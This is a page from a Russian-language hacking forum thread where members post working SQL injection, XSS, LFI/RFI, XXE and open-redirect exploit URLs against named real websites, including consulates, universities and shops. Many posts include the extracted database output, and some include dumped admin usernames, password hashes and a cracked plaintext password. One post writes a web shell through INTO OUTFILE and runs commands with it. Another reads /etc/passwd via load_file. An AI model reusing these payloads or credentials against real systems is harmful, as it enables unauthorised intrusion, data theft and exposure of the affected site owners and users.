PDA

Просмотр полной версии : Уязвимости SQLi, XSS и другие.


Страницы : 1 [2]

leksadin
19.02.2017, 23:37
↑ (https://antichat.live/posts/4050788/)
Тогда это не блайнд, если результат запроса выводится на станицу. А если сам параметр на странице то это уже не SiXSS а обычная отраженка. Но это просто термины. А так почёт и уважение.....



Увы, но ты не прав. На страницу попадают не результаты запроса. Ситуация такова, что если запрос корректен (любого вида), то на сайте есть рекомендации, противном случае они пропадают. Это и есть блайнд.

Насчёт SiXSS - это когда твой запрос попадает сначала в SQL запрос, а потом отображается на сайте.И как один из результатов, например, юниона будет алерт.

SooLFaa
19.02.2017, 23:49
↑ (https://antichat.live/posts/4051065/)
Увы, но ты не прав. На страницу попадают не результаты запроса. Ситуация такова, что если запрос корректен (любого вида), то на сайте есть рекомендации, противном случае они пропадают. Это и есть блайнд.
Насчёт SiXSS - это когда твой запрос попадает сначала в SQL запрос, а потом отображается на сайте.И как один из результатов, например, юниона будет алерт.


Так это не противоречит тому, что я написал. Если ты выводишь алерт через параметр со страницы или через скулю....это немного разные вещи. Я только об этом.

SeytaR
25.02.2017, 01:10
www.ghanaconsulate.ae (http://www.ghanaconsulate.ae)

Db Version :5.1.73-community

Db User : itscircle@localhost

Port :3306

Check if Symlink is ON :YES

Server Os Detected :Win32

http://www.ghanaconsulate.ae/about.php?id=-8 union select 1,group_concat(username,0x3a,password),3,4,5,6 from user--+


admin@ghanaconsulate.ae (mailto:admin@ghanaconsulate.ae):db38984fdc3d2fc99 2bdaaf12e64d976


db38984fdc3d2fc992bdaaf12e64d976:ITS@123

BabaDook
15.03.2017, 21:25
http://keralajobclub.com/candidate_profile.php?id==UlRJdXWYNGMWdlVxplRkh1VG plNZVFcrFWMkZ3UrRGVUNDaYVFMsFmVtJ1baZkWQ10V4ZUVwkD NiZFbJdVb4hWYwUjVVRlU0IlVKtEVq5EVTRlVGlVbstWYxoFeV pmSSJ2MCVnVxg2bTdkShRFbSZVZXh3cURlVWdlRkVzVVZlTUZk WWVFVKJkUspFRVxmUYZVV0kXWwg3bhFjU6NlaKNlVzIESXtmUT JWbGBHVtB3VNZVS5V1V1cUTx4UWjZkWsFWVwVEVYp1RNxWW410 RxoVZtljRaZEcvJmRWNzUtFjTNZ1a5dFWrBTTHpEaaZkWOJ2Mo ZVWrlTYixGbKd1aatWYUZFWWhEZTJWVxYXZEpkWkZUW4lFbKNV THlUMhJDeO5kVWllVzwmWSVVMNZFbWJVZqZkRVJTN3dlRjJzYH hHaUNTQ5lFVadXTWVFMRxmUYdFSBdXWyYUYWtGO4JGRGdVZIRG SWVkVLJVV180UsJ1Ul1GezRFVW50UGBXWSxmUrdVVwVFVtlzSN xmWXFlaORlVIFVeZFjSP10RGNDZEJkVNBjSFZVRWdVTX5EUiRk SrVmbkZUVtVzTNFjUVpVRoxGVrRzdaRUU41kRVpXYGhWVjdkUJ pVV1MXTyEFMORlQS1kMoVnVGJ1aTdkVQJGRKtmTEZlVaRlTv1U MSVkWFhGbVVEN4pFRVhXTGVkeiZEaVZ1RSllWVVzcN1WUx0kVW xWTygXdWVkUrd1RWBFVqZ0aORlVWlFVONnYsFVMaZEasVVR0cn WEVVNNZUV6NmRoVlUHJVdaVVNP10VRJTTWZFaNNjQZZFRWtmYt ZFUUpmQr5kaVdnVU50dixmU3p1R1wGVycneaRUW10kRFp3YE5U VWdkUJRVV18UTHJ1MNRkQW1EMKVlVIJ0aTVUMPJGROtGZ6F1dV RlTDFGbSVlUtRHa

Есть ещё всяких много разных, если будет интерес буду выкладывать редко

pastword
16.03.2017, 17:03
↑ (https://antichat.live/posts/4060872/)

http://keralajobclub.com/candidate_profile.php?id==UlRJdXWYNGMWdlVxplRkh1VG plNZVFcrFWMkZ3UrRGVUNDaYVFMsFmVtJ1baZkWQ10V4ZUVwkD NiZFbJdVb4hWYwUjVVRlU0IlVKtEVq5EVTRlVGlVbstWYxoFeV pmSSJ2MCVnVxg2bTdkShRFbSZVZXh3cURlVWdlRkVzVVZlTUZk WWVFVKJkUspFRVxmUYZVV0kXWwg3bhFjU6NlaKNlVzIESXtmUT JWbGBHVtB3VNZVS5V1V1cUTx4UWjZkWsFWVwVEVYp1RNxWW410 RxoVZtljRaZEcvJmRWNzUtFjTNZ1a5dFWrBTTHpEaaZkWOJ2Mo ZVWrlTYixGbKd1aatWYUZFWWhEZTJWVxYXZEpkWkZUW4lFbKNV THlUMhJDeO5kVWllVzwmWSVVMNZFbWJVZqZkRVJTN3dlRjJzYH hHaUNTQ5lFVadXTWVFMRxmUYdFSBdXWyYUYWtGO4JGRGdVZIRG SWVkVLJVV180UsJ1Ul1GezRFVW50UGBXWSxmUrdVVwVFVtlzSN xmWXFlaORlVIFVeZFjSP10RGNDZEJkVNBjSFZVRWdVTX5EUiRk SrVmbkZUVtVzTNFjUVpVRoxGVrRzdaRUU41kRVpXYGhWVjdkUJ pVV1MXTyEFMORlQS1kMoVnVGJ1aTdkVQJGRKtmTEZlVaRlTv1U MSVkWFhGbVVEN4pFRVhXTGVkeiZEaVZ1RSllWVVzcN1WUx0kVW xWTygXdWVkUrd1RWBFVqZ0aORlVWlFVONnYsFVMaZEasVVR0cn WEVVNNZUV6NmRoVlUHJVdaVVNP10VRJTTWZFaNNjQZZFRWtmYt ZFUUpmQr5kaVdnVU50dixmU3p1R1wGVycneaRUW10kRFp3YE5U VWdkUJRVV18UTHJ1MNRkQW1EMKVlVIJ0aTVUMPJGROtGZ6F1dV RlTDFGbSVlUtRHa

Есть ещё всяких много разных, если будет интерес буду выкладывать редко


интереснее то, как ты нашел уязвимость)), но все таки выкладывай, очень интересно увидеть разные случай.

BabaDook
29.03.2017, 20:51
Думал что- же такое. В итоге оказался пустяк.


http://randyfath.com/international.php?id=-53 UnIon SeLEcT 0x3120616e642066616c73652020207 56e696f6e2073656c65637420312c322c7573657228292c342 c352c36,2,3,4,5,6

Просто не обычно

joelblack
29.03.2017, 21:31
target:http://uzswlu.uz (http://uzswlu.uz)

type:SQL Injection


http://uzswlu.uz/site/search?search=1" and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 --+

pastword
30.03.2017, 18:05
Sql-inject


http://dars.tj/topic.php?SECTION_ID=22'+UnIoN+SeLeCt+1,2,3,4,5,6, 7,8,concat_ws(0x3a,LOGIN,PASSWORD),10,11,12,13,14, 15,16,17,18,19,20,21,22,23+from+c_user+--+&ID=35&UPPER_ID=

admin:v0_S)B6j1a321ed955a9a82777afe79f9f74bc5d

teacher:eRuzjWNCd8a62f807a2fe77ab7c3e065697c36d7

Печа
08.05.2017, 21:05
Несколько SQLi с чтением файла из файловой системы


http://immersionprograms.com/index.php/info/gallery?sid=956&catid=-1 union all select 1,2,3,load_file('/etc/passwd'),5,6,7,8,9&mcatid=806

Здесь вывод в title


view-source:http://www.eandkwood.com/category.php?c=1' union all select 1,2,3,load_file('/etc/passwd'),5,6,7 and '0'='0

Некий шоп с фармой


http://www.rxnature.com/category.html?cid=1' union all select 1,load_file('/etc/passwd'),3,4,5,6,7,8,9,10,11,12,13 and '0'='0

Печа
09.05.2017, 23:02
Запись минишела через SQLi и выполнение команд на сервере.


http://www.hamber.net/News_Detail.php?SN=-1 union all select 1,2,3,'',5,6,7 into outfile '/var/www/html/xux.php' --+
http://www.hamber.net/xux.php?cmd=ls -l

Печа
15.05.2017, 01:10
SQLi Error base внедрение двойным запросом.


http://www.hairboutique.com/glossary/Detail.php?Keyword=Dimethicone Copolyol Meadowfoamate' and (select 1 from(select count(*), concat(0x3a,0x3a,(select user()),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a)b) and '1'='1

root@HB-85|file_priv Y|5.5.19|Win64x86|

Печа
15.05.2017, 16:00
Сайт: russikona.ruТИЦ 160

SQLi Error base

russikon_db@localhost|file_priv N|5.5.52-cll-lve|Linux|MySQL Community Server (GPL)|x86_64|


http://www.russikona.ru/news.php?id=198' AND (select 1 from(select count(*), concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='admin' limit 1,1),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b) --+

XSS-reflected:


http://www.russikona.ru/news.php?id=198%27%3e%3cbody+onload%3dalert(docume nt.cookie)%3e

Надеюсь ничьих чувств не оскорбил

Печа
17.05.2017, 00:02
Сайт: rakuraku-home.jp

SQLi Error base через POST

queserser_1301@10.1.0.111|5.0.27-standard-log|unknown-linux-gnu|x86_64|MySQL Community Edition - Standard (GPL)|

Уязвимые параметры account и password

В запросе через Repeater нужно отправить в параметр account эксплоит, а в параметр password любой символ, букву или цифру

эксплоит:


URL:http://www.rakuraku-home.jp/system/login/login.php
POST:' AND (select 1 from(select count(*), concat(0x3a,0x3a,(select user()),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a)b) #

вход в админку логин и пароль 1' or '1

Админка:


http://www.rakuraku-home.jp/system/

Печа
18.05.2017, 16:51
Парочка сайтов с финансовой тематикой

Сайт: eltee.de

SQL Injection через GET, уязвимый параметр id, вывод в title

pc-linux-gnu:i686:dbo456679871@212.227.29.56:db456679871:5. 1.73

эксплоит:


view-source:http://www.eltee.de/education_id.php?id=-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(@@version_compile_os,0x3a,@@versio n_compile_machine,0x3a,user(),0x3a,database(),0x3a ,@@version,0x3a,0x3a,0x3a,FLOOR(RAND(0)*2))a FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY a)b)

Сайт: businesstoday.lk

SQL Injection через GET, уязвимый параметр issue

5.5.52-cll:bttoday_bt:bttoday_btadmin@localhost:Linux:i68 6:/usr

эксплоит:


http://www.businesstoday.lk/bnb.php?bnbId=&issue=-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(@@version,0x3a,database(),0x3a,use r(),0x3a,@@version_compile_os,0x3a,@@version_compi le_machine,0x3a,@@basedir,0x3a,FLOOR(RAND(0)*2))a FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY a)b)

Печа
19.05.2017, 19:56
Шоп с 3d принтерами и всяким оборудованием

Сайт: smtmax.com

SQL Injection через GET, уязвимый параметр act

Linux:x86_64:smtmax8_smtmax@localhost:smtmax8_smtm ax:5.6.35:/usr

эксплоит:


http://www.smtmax.com/info.php?act=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1) %3e(SELECT+COUNT(*)%2cCONCAT(%40%40version_compile _os%2c0x3a%2c%40%40version_compile_machine%2c0x3a% 2cuser()%2c0x3a%2cdatabase()%2c0x3a%2c%40%40versio n%2c0x3a%2c%40%40basedir%2c0x3a%2cFLOOR(RAND(0)*2) )a+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+a)b )%2b%27

Сайт адалт тематики: straightpornstuds.com

Примерные данные за день

Посетителей: 1469

Просмотров: 5878

Boolean Based SQL Injection

5.0.96 log:str5lt3m 2@107.180.121.24:str5lt3m1 2

Если появился видео ролик от BRAZERS с брюнеткой в очках с толстой жопой и силиконовыми буферами значит "true"

Если перекинуло на ролик от DDFnetwork где бландинку долбят в рот в четыре ствола это "false"

эксплоит:


http://straightpornstuds.com/80341%20OR%20(select%20ascii(substr(database(),1,1 ))=115).html

P.s. когда true страничка может долго подгружаться.

Печа
20.05.2017, 20:23
Щоп с компьютерными аксессуарами

Сайт: groupgear.co.uk

MS SQL Injection через POST

уязвимый параметр inputsearch

microsoft sql server 2012 (sp1) - 11.0.3156.0 (x64) may 4 2015 18:48:09 copyright (c) microsoft corporation web edition (64-bit) on windows nt 6.2 <x64> (build 9200: ) (hypervisor)|

computergear2012|computerSQL2014

эксплоит:


URL:http://www.groupgear.co.uk/searchResults.asp
POST:'AND 1=cast(@@VERSION as varchar(8000)) or '1'='

Печа
21.05.2017, 23:26
Сайт: magiclantern.org.uk

Boolean Based SQL Injection черз GET, уязвимый параметр id

5.5.54-38 7-log:umag_249477_0001 linweb7.atlas.pipex.net:magiclanternorguk_249477_d b1

Если есть пост с заголовком The Temple of Minerva "true"

Если нет поста с заголовком The Temple of Minerva "false"

Эксплоит:


http://www.magiclantern.org.uk/sales/publications.php?id=13 OR (select ascii(substr(@@VERSION,1,1))=53)

Stored XSS:

Уязвимые параметры: Contact_Name;Email_address;Email_address2;Subject

Открываем URL в Firefox и в одном из уязвимых полей или во всех вставляем payload, жмем Submit, наш код сохранился на сервере


URL:http://www.magiclantern.org.uk/contact.php
payload: ">

Теперь нужно сохранить Cookie PHPSESSID(из Firefox) в блокнот

Вычистим куки из Firefox и пройдем снова по нашему URL ни чего не работает (( закрываем Firefox и открываем другой браузер,

например хром, устанавливаем туда любой кукименежжер, открываем любую страницу нашего сайта например главную magiclantern.org.uk

в куки менеджере меняем Cookie PHPSESSID(из Хром) на Cookie PHPSESSID(из Firefox) переходим на вкладку Contact Us видим выполнение нашего скрипта в хроме.

BabaDook
22.05.2017, 01:39
НУ я так и знал. А вам слабо самому что-то найти и сделать? Вы попробуйте, я уверен вы сможете. Я просто не понимаю, я конечно не профи, но я невкуриваю, зачем крутить как слепую когда есть вывод. А вообще, скажи мне , что это а инструмент такой?

Там ещё мод сек, только что он делает я не понял

http://s018.radikal.ru/i520/1705/a7/7398f4b53cfc.png (http://radikal.ru)

Печа
22.05.2017, 05:40
↑ (https://antichat.live/posts/4087666/)
НУ я так и знал.




http://www.magiclantern.org.uk/sales/publications.php?id=-1 union all select 1,2,USER(),@@version,database(),@@basedir,@@versio n_compile_os,@@version_compile_machine,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34,35,36,37,38,39 --+

Так лучше ? ))

Печа
22.05.2017, 16:37
↑ (https://antichat.live/posts/4087780/)
Нет, не лучше. Ты каким софтом крутишь?


burpsuite, SQLmap, Netsparker

Печа
22.05.2017, 20:27
SQLi с чтением файла из файловой системы и file_priv Y

Сайт:eohu.ca

Уязвимый параметор: newsID через GET

root:Y,root:Y,root:Y,debian-sys-maint:Y,phpmyadmin:N,root:Y

root@localhost:5.1.49-1ubuntu8:debian-linux-gnu:x86_64

Эксплоит:


http://www.eohu.ca/news/view_news_e.php?newsID=-1' union all select group_concat(user,0x3a,file_priv),user(),load_file ('/etc/passwd') from mysql.user --+

Печа
24.05.2017, 16:13
SQLi с чтением файла из файловой системы

Сайт:bbgv.org

Уязвимый параметор: cat_id через GET

root:Y,root:Y,root:Y,:N,:N,bbgv_web:N,bbgv_bk:N

root@localhost:5.1.73:redhat-linux-gnu:x86_64

Эксплоит:


view-source:http://bbgv.org/bbgv-events/events.html?cat_id=-1 union all select 1,2,3,group_concat(user,0x3a,file_priv),5,6,7,8,9, 10,user(),12,13,14,15,load_file('/etc/passwd'),17,18,19,20,21,22,23,24,25,26 from mysql.user --+

Печа
25.05.2017, 17:14
Сайт:salut.ru ТИЦ 475

SQLi Error base черз GET, уязвимый параметр SectionId

salut@localhost:5.1.67-0ubuntu0.10.04.1:debian-linux-gnu:x86_64:/usr/

Эксплоит:


http://salut.ru/Section.php?SectionId=18' AND (select 1 from(select count(*), concat(0x3a,0x3a,(select @@version),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a)b) --+

Сайт:irbis-opt.ru ТИЦ 20 Всякие палатки и спортивная снаряга

SQLi черз GET, уязвимый параметр idd

nordsportspb@81.177.141.127:10.1.22-MariaDB:Linux:x86_64:/usr

Эксплоит:


http://www.irbis-opt.ru/catalog.php?idd=-12' union all select @@version --+

Сайт:economic-study.ru ТИЦ 10 Вузы Москвы

SQLi черз GET, уязвимый параметр ID

vsevedpr_econom@localhost:5.5.52-38.3:vsevedpr_econom:debian-linux-gnu:x86_64:/usr

Эксплоит:


http://economic-study.ru/ManagerDetails.php?LID=1&ID=-1 union all select 1,2,3,user(),@@version,database(),@@version_compil e_os,@@version_compile_machine,@@basedir,10 --+

Octavian
25.05.2017, 18:02
↑ (https://antichat.live/posts/4089268/)
Сайт:salut.ru
ТИЦ 475
SQLi Error base черз GET, уязвимый параметр SectionId
salut@localhost:5.1.67-0ubuntu0.10.04.1:debian-linux-gnu:x86_64:/usr/
Эксплоит:

http://salut.ru/Section.php?SectionId=18' AND (select 1 from(select count(*), concat(0x3a,0x3a,(select @@version),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a)b) --+

Сайт:irbis-opt.ru
ТИЦ 20
Всякие палатки и спортивная снаряга
SQLi черз GET, уязвимый параметр idd
nordsportspb@81.177.141.127:10.1.22-MariaDB:Linux:x86_64:/usr
Эксплоит:

http://www.irbis-opt.ru/catalog.php?idd=-12' union all select @@version --+

Сайт:economic-study.ru
ТИЦ 10
Вузы Москвы
SQLi черз GET, уязвимый параметр ID
vsevedpr_econom@localhost:5.5.52-38.3:vsevedpr_econom:debian-linux-gnu:x86_64:/usr
Эксплоит:

http://economic-study.ru/ManagerDetails.php?LID=1&ID=-1 union all select 1,2,3,user(),@@version,database(),@@version_compil e_os,@@version_compile_machine,@@basedir,10 --+



.ru саиты запрещены

Печа
25.05.2017, 18:26
↑ (https://antichat.live/posts/4089287/)
.ru саиты запрещены


Я когда форум просматривал, посты с .ru часто попадались, или это новые правила?

Если админы скажут не вопрос, удалю свой пост.

Да и софтом я в .ru не лазил, искал через дорки и крутил руками

Печа
26.05.2017, 14:41
Сайт:ene.com.tw

SQLi черз GET с чтением файла из файловой системы, уязвимый параметр pid

root:Y,root:Y,root:Y,:N,:N,enemysql:N,enemysql:Y.

enemysql@localhost:5.1.73:redhat-linux-gnu:x86_64:/var/log/mysqld.log.

Эксплоит:


http://www.ene.com.tw/english/ir/newsdetail.php?fid=14&pid=-1' union all select 1,2,3,group_concat(user,0x3a,file_priv),5,@@versio n,load_file('/etc/passwd'),8,9,10 from mysql.user --+

BabaDook
27.05.2017, 23:08
http://s019.radikal.ru/i644/1705/37/90aa42673649.png (http://radikal.ru)

Octavian
11.06.2017, 14:54
Предугадываем URL восстановление пароля md5(time())


http://help.orange.md/resetpassword/be28b3765fe7914555df3f3df39caa2e

paponi
24.07.2017, 13:28
http://www.luxpodarok.com.ua/index.php?for=999999.9 union all select }here sql{

x4t3a
30.09.2017, 22:34
sqli: http://xn--80aaatb1acozlcgklg.xn--p1ai/goods.aspx?id=80637 UNION ALL SELECT 1,2,3 (http://xn--80aaatb1acozlcgklg.xn--p1ai/goods.aspx?id=80637%20UNION%20ALL%20SELECT%201,2,3 )

а дальше не получается раскрутить

paponi
02.10.2017, 10:47
↑ (https://antichat.live/posts/4089682/)
Сайт:ene.com.tw
SQLi черз GET с чтением файла из файловой системы, уязвимый параметр pid
root:Y,root:Y,root:Y,:N,:N,enemysql:N,enemysql:Y.
enemysql@localhost:5.1.73:redhat-linux-gnu:x86_64:/var/log/mysqld.log.
Эксплоит:

http://www.ene.com.tw/english/ir/newsdetail.php?fid=14&pid=-1' union all select 1,2,3,group_concat(user,0x3a,file_priv),5,@@versio n,load_file('/etc/passwd'),8,9,10 from mysql.user --+



Давно созрел вопрос, да только все никак руки не "доходили". Можно ли залить шелл вместо "load_file('/etc/passwd')"? Просто пока не понимаю, почему срабатывает php в SQL иньекции...

t0ma5
04.10.2017, 18:13
↑ (https://antichat.live/posts/4134233/)
почему срабатывает php в SQL иньекции...


php тут не причем, mysql поддерживает работу с файловой системой

https://www.w3resource.com/mysql/string-functions/mysql-load_file-function.php

https://dev.mysql.com/doc/refman/5.7/en/select-into.html

paponi
06.10.2017, 10:09
Спасибо. Век живи, век учись.

Unknown
11.10.2017, 10:59
Я кодинге не очень силен, но таковы правила форума и писать я могу только здесь. Помогите набрать 5 репутации

BabaDook
23.10.2017, 22:45
http://www.handelingsgerichtwerken.be/bestanden/download.php?id=69'+and+false+union select null, 2,3,4,group_concat(0x202020,table_name,0x3c3e,colu mn_name)+from information_schema.columns+where t able_schema=database()+--+-

Octavian
28.12.2017, 20:49
http://www.saifaiims.com/download.php?filename=../config/configuration.php

The404
31.12.2017, 13:06
http://www.baikap.de/index2.php?include=/etc/passwd&id=85&language=E|LFI|[DE] Germany|12/21/2017 05:38:42
http://www.avionews.it/index.php?corpo=/etc/passwd&news_id=1207340&pagina_chiamante=index.php|LFI|[IT] Italy|12/22/2017 06:51:05
https://drbl.org/management/techrpt.php?c=../../../../../etc/passwd&t=Start, restart or stop DRBL-related services|LFI|[JP] Japan|12/23/2017 06:10:26
http://caiana.caia.org.ar/template/caiana.php?pag=../../../../../etc/passwd&vol=3|LFI|[AR] Argentina|12/23/2017 08:47:59
http://www.energetica-india.net/download.php?seccion=articles&archivo=../../../../../../../../etc/passwd|LFI|[ES] Spain|12/23/2017 08:52:43
http://www.mcu.es/deportebase/cgi/um?M=/d7/f7&O=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd% 00&N=&L=0|LFI|[ES] Spain|12/23/2017 09:00:57
https://www.txregionalcouncil.org/display.php?page=/etc/passwd|LFI|[US] United States|12/23/2017 09:10:58
http://www.basegroup.su/index.php?Page=http%3a%2f%2fwww.google.com|RFI|[RU] Russian Federation|12/23/2017 09:58:38
http://www.iatvt.ru/index.cgi?doc=../../../../../../etc/passwd%00|LFI|[RU] Russian Federation|12/23/2017 10:54:42
http://www.musifratz.de/content.php?seite=/etc/passwd&rubrik=kinderkultur&ansicht=projekte|LFI|[DE] Germany|12/23/2017 11:13:42

BabaDook
02.01.2018, 16:51
http://www.bpc.gov.bd/contactus.php?id=4439'+/*!12345UNiOn*/%0ASeLEct+1,2,/*!50000user()*/,4,5,6,7+--+_
ebfashion.com.bd/index.php?id=-8'+UnIoN+SeLEcT+1,user(),2+--+-
http://www.vertexhome.co.il/pageE.php?id=110+UnIon+SeLEct+1,2,3,4,5,6,7,8,9,gr oup_concat(table_name),11 from information_schem a.tables where table_schema=database()+--+-
http://foundation.sigmachi.org/station.php?id=wtg'+and+false+UnIon%0ASeLEct+1,use r(),3,4,5,6+--+_
http://www.commongroundnews.org/article.php?id=-32240'+/*!12345UnIoN%0ASeLEcT*/+1,2,user(),4,(/*!12345SELECT*/+/*!12345GROUP_CONCAT(table_name+SEPARATOR+0x3c62723 e)+FROM+/*!50000INFORMATION_SCHEMA.TABLES*/+WHERE+TABLE_SCHEMA=DATABASE()),6,7,8,9,10,11,12,1 31,4,15,15,15,15,15,16,16,22+--+-&lan=ba&sp=1
http://oppodigital.in/product-details.php?id=9 and false UNiOn+SElEcT @,@,@, @,@,@,@,@,group_concat(table_name),@ from inform ation_schema.tables #




https://depositfiles.od.ua/tools/httpheaders.php

https://a.radikal.ru/a37/1801/32/9659b8e5d398.png (https://radikal.ru)

ShpillyWilly
09.01.2018, 13:07
http://www.tnla.com/events.php?id=38+UNION+SELECT+1,concat(username,pa ssword)+from+tnlacom_tnla.admin_users+--+

Mexel
11.01.2018, 19:48
Провайдер Электронный щит.

Локальная XSS.


http://wwwcom.ru/connect.php/%22%3E%3Cscript%3Ealert('Tayler(Mexel)')%3C/script%3E

joelblack
15.01.2018, 05:25
target: http://www.premium-network.ru

type: Time-based, Error-based

user:forumpt@localhost1

version:5.5.371

Time-based:


www.premium-network.ru/index.php?id=sktv_news&ns=70'+and+if(substring(version(),1,1)=5,SLEEP(15) ,1)--+


Error-based:


http://www.premium-network.ru/index.php?id=sktv_news&ns=70%27%20union%20select%20count(*),concat(versio n(),floor(rand(0)*2))x,2,3%20from%20information_sc hema.tables%20group%20by%20x--+

xaphan
31.01.2018, 18:29
OOB XXE


http://www.xmlforasp.net/SchemaValidator.aspx



XML Payload:



&test;


.dtd File:



">
%all;


https://i.imgur.com/tkvMGVC.jpg

BabaDook
03.02.2018, 14:40
↑ (https://antichat.live/posts/4173376/)
target: http://www.premium-network.ru

type: Time-based, Error-based

user:forumpt@localhost1

version:5.5.371

Time-based:


www.premium-network.ru/index.php?id=sktv_news&ns=70'+and+if(substring(version(),1,1)=5,SLEEP(15) ,1)--+


Error-based:


http://www.premium-network.ru/index.php?id=sktv_news&ns=70%27%20union%20select%20count(*),concat(versio n(),floor(rand(0)*2))x,2,3%20from%20information_sc hema.tables%20group%20by%20x--+



Лайк тому кто попробует сделать с выводом, не люблю я слепые, OOB приветствуется.Точку входа не менять желательно.

st55
03.02.2018, 15:28
↑ (https://antichat.live/posts/4180264/)
Лайк тому кто попробует сделать с выводом, не люблю я слепые, OOB приветствуется.Точку входа не менять желательно.




70('UNION ALL SELECT 1,2,version(),3-- a)---

Вывод в мета-теге:

cat1vo
03.02.2018, 19:24
↑ (https://antichat.live/posts/4180275/)

70('UNION ALL SELECT 1,2,version(),3-- a)---

Вывод в мета-теге:









70'+union+select+1,version(),3,4--+

Тут же банально все, зачем скобки?

BabaDook
04.02.2018, 03:16
http://www.boxofficemojo.com/.htaccess
view-source:http://www.boxofficemojo.com/maintenance.html

Octavian
04.02.2018, 19:35
Sql Injection


http://www.ceadir-lunga.md/index.php?prm=999%27+UNION+ALL+SELECT+version()+--+&mid=201
http://retrofilms.in/forum/feedcat.php?id=2%27+union+all+select+1,2,3,4,5,6,7 ,8,9+--+

Мда редкость


http://katalogshop.md/tmp/

BabaDook
16.02.2018, 23:00
http://pravoslavsad4.ru/view_index21b.php?id=-1%27%20UnIon%20SeLEct%201%2C2%2C3%2C4%2C5%2C6%2C0x 3c7363726970743e616c65727428646f63756d656e742e646f 6d61696e293c2f7363726970743e%20--%20-

BabaDook
06.03.2018, 22:45
↑ (https://antichat.live/posts/4133806/)
sqli:
http://xn--80aaatb1acozlcgklg.xn--p1ai/goods.aspx?id=80637 UNION ALL SELECT 1,2,3 (http://xn--80aaatb1acozlcgklg.xn--p1ai/goods.aspx?id=80637%20UNION%20ALL%20SELECT%201,2,3 )
а дальше не получается раскрутить


Что не получается? П.С только сейчас увидел ты это аттак


http://атаксупермаркет.рф/goods.aspx?id=(SELECT+TOP+1+TABLE_NAME+FROM+INFORM ATION_SCHEMA.TABLES +WHERE+TABLE_NAME+NOT+IN+('ym l_catalog','shop','email','currencies','currency', 'categories','category','offers','offer','category Id','picture','orderingTime','onstock','ordering') )+--+

Дальше сам


https://rdot.org/forum/showthread.php?t=826

BabaDook
17.03.2018, 19:11
https://www.mournhockey.com.ua/go.php?http://FFFFFFF.org
http://iz.com.ua/engine/go.php?url=aHR0cDovL2dvb2dMZS5jb20=

OpenRedirect


https://bosa.in.ua/event/?id=1'+and+false+%55%6e%49%6f%4e+%2f%2a%21%31%32%3 3%34%35%53%65%4c%45%63%74%2a%2f+1,user(),3,4,5,6,7 ,8,9,database(),1,2,3,4,5,6,7,8,9,0,1,2,3,4,versio n(),6,7,8,9,0,1+--+-

Vip77
23.03.2018, 20:39
https://www.edmunds.com/a/?":""});alert(document.cookie);//
http://oregonstate.edu/training/course_search.php?subject=">alert(999)
https://lyricstranslate.com/?page=">alert(7889789)
http://720pizle.com/ara.asp?a=">alert(7889789)
http://epinions.com/search/books/63715?">alert(6456456)
https://mgronline.com/south/1232/search?searchTxt=">alert(045839)
http://naszemiasto.pl/firmy/,polska,78425,21.html?miasto=">alert(4389)
http://www3.gogoanime.tv/">alert(4389)
https://bursadabugun.com/ruya-tabirleri/?q[keyword]=">alert(4389)
https://computerhoy.com/listas/internet/mejores-cascos-auriculares-inalambricos-2016-32365?page=alert(4389)
https://warframe.market/alert(4389)
https://goal.in.th/%E0%B8%9C%E0%B8%A5%E0%B8%9A%E0%B8%AD%E0%B8%A5%E0%B 8%A2%E0%B9%89%E0%B8%AD%E0%B8%99%E0%B8%AB%E0%B8%A5% E0%B8%B1%E0%B8%87/?Line=">alert(4389)
http://www.gazetevatan.com/Default.aspx?aType=';alert();//
http://thebitcoincode.com/video.php?poster=">alert(4389)
https://gamebanana.com/tools?">alert(4389)
https://indosport.com/">alert(4389)
http://brasilescola.uol.com.br/">alert(4389)
https://watchasian.co/">alert(4389)
https://mgronline.com/south/1232/search?searchTxt=">alert(4389)
http://portail.free.fr/services/pagesjaunes/bons-plans.php?where=">alert(4389)
http://minnstate.edu/jobs/searchResults.php?">alert(4389)
https://eadaily.com/">alert(00088)
http://projectfreetv.bz/hd/project.php?title=alert(4389)
http://cnrtl.fr/lexiques/morphalou/licence_morphalou.php?version=">alert(4389)

Octavian
23.06.2018, 14:35
↑ (https://antichat.live/posts/4220479/)

http://www.infocom.md/beneficiari.php?id=1%27+UnIoN+SeLEct+1,user(),(sel ect(select+concat(@:=0xa7,(select+count(*)from(inf ormation_schema.columns)where(@:=concat(@,0x3c6c69 3e,table_name,0x3a,column_name))),@)))+--+-



/threads/426171/page-6 (https://antichat.live/threads/426171/page-6/)

Выкладывал уже

fiji
19.10.2018, 18:13
http://wrestling.work/eventchapter.php?id=2%27+union+select+1,2,(select( @x)from(select(@x:=0x00),(select(0)from(tione_igs. applications)where(0x00)in(@x:=concat(@x,0x3c62723 e,user,0x3a,pass))))x),4,5,6,7,8,9,10--+1

lukeone
20.10.2018, 03:59
http://cpa-monsters.ru/" AND (SELECT 2809 FROM(SELECT COUNT(*),CONCAT(0x716b626a71,(SELECT (ELT(2809=2809,1))),0x716b766b71,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND "qGaW"="qGaW


.SpoilerTarget" type="button">Spoiler: from sqlmap
Parameter: #1* (URI)

Type: boolean-based blind

Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)

Payload: http://cpa-monsters.ru:80/" AND MAKE_SET(1782=1782,4508) AND "lURK"="lURK

Vector: AND MAKE_SET([INFERENCE],[RANDNUM])

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

